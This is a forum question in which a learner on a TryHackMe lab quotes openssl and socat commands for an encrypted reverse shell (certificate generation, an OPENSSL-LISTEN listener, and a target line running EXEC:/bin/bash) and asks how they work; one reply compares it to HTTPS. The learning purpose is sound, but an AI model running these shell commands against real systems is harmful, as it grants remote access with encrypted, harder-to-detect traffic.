While studying reverse/bind shells on TryHackMe, I encountered a few lines of code that I am struggling to fully understand their functions. Here is the code in question:
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
-generates an RSA private key. What specifies it as being private and not public?
-generates a certificate, however I thought certificates were mainly used for websites?
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -
-socat is opening a listener with OpenSSL instead of TCP, which I assume starts an endpoint of an encrypted channel.
-This listener is using a .pem file that is created with a line of code not included here, which includes the private key and TLS certificate.
-The listener is being set to run with that certificate, while 'verify=0' ensures it is run without checking its authenticity from a CA.
socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash
-The target connects to the listener by specifying its IP and port number, while also not checking for the authenticity of a certificate.
What exactly is going on here? Why does the machine connecting to the OpenSSL listener not need to provide a key for an encrypted channel? What is the difference between socat TCP-L and socat OPENSSL-L?
If anyone could help by breaking down some of what's happening it'd be greatly appreciated.
This is way of TLS. Like browser connects to secure HTTPS. You can always change verify option to force signature verification methods.
There is small project which I did about it.
https://aze2201.github.io/shell_sockV2/